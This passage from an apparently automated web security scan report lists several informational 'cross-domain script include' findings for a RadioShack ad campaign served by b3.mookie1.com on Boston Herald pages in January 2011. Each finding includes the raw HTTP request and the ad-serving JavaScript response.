document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.5;abr=!ie;sz=160x600;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1894396505/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1894396505?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.34. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90?http://r1-ads.ace.advertising.com/click/site=0000753543/mnum=0000950189/cstr=39420189=_4d433bda,2510810860,753543^950189^81^0,1_/xsxdata=$XSXDATA/bnum=39420189/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660; session=1296251852|1296251858

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3192
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000753543/mnum=0000950189/cstr=39420189=_4d433bda
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.5;abr=!ie;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000753543/mnum=0000950189/cstr=39420189=_4d433bda,2510810860,753543_950189_81_0,1_/xsxdata=$XSXDATA/bnum=39420189/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1940003036/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1940003036?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.35. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=96618366=_4d435ebd,0063835233,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=96618366/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; session=1296256112|1296260551

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:26:36 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=96618366=_4d435ebd
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=96618366=_4d435ebd,0063835233,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=96618366/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1419206302/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1419206302?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.36. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:20:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2667
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/63904
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/639042379/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=639042379?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.37. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=96618366=_4d435ebd,0063835233,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=96618366/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; session=1296256112|1296260551

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3189
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=96618366=_4d435ebd
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=96618366=_4d435ebd,0063835233,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=96618366/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/353974624/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=353974624?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.38. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90?http://r1-ads.ace.advertising.com/click/site=0000753541/mnum=0000950190/cstr=59127172=_4d433bca,0085444835,753541^950190^81^0,1_/xsxdata=$XSXDATA/bnum=59127172/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:00 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3183
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2645525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000753541/mnum=0000950190/cstr=59127172=_4d433bca
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000753541/mnum=0000950190/cstr=59127172=_4d433bca,0085444835,753541_950190_81_0,1_/xsxdata=$XSXDATA/bnum=59127172/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/835359449/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=835359449?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.39. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90?http://r1-ads.ace.advertising.com/click/site=0000753541/mnum=0000950190/cstr=59127172=_4d433bca,0085444835,753541^950190^81^0,1_/xsxdata=$XSXDATA/bnum=59127172/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3192
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000753541/mnum=0000950190/cstr=59127172=_4d433bca
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000753541/mnum=0000950190/cstr=59127172=_4d433bca,0085444835,753541_950190_81_0,1_/xsxdata=$XSXDATA/bnum=59127172/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1687741401/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1687741401?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.40. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:20:55 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2676
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5345525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/13942
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1394219288/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1394219288?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.41. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10105242535@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10105242535@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10105242535@x90 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:20:57 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2667
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/76977
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/769775360/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=769775360?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.42. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10105242535@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10105242535@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10105242535@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=51370141=_4d436570,0105242535,766159^950193^1183^0,1_/xsxdata=$XSXDATA/bnum=51370141/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660; session=1296256112|1296262268

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=51370141=_4d436570
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=51370141=_4d436570,0105242535,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=51370141/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1421913197/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1421913197?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.43. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10105242535@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10105242535@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10105242535@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=51370141=_4d436570,0105242535,766159^950193^1183^0,1_/xsxdata=$XSXDATA/bnum=51370141/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660; session=1296256112|1296262268

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:55:12 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=51370141=_4d436570
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
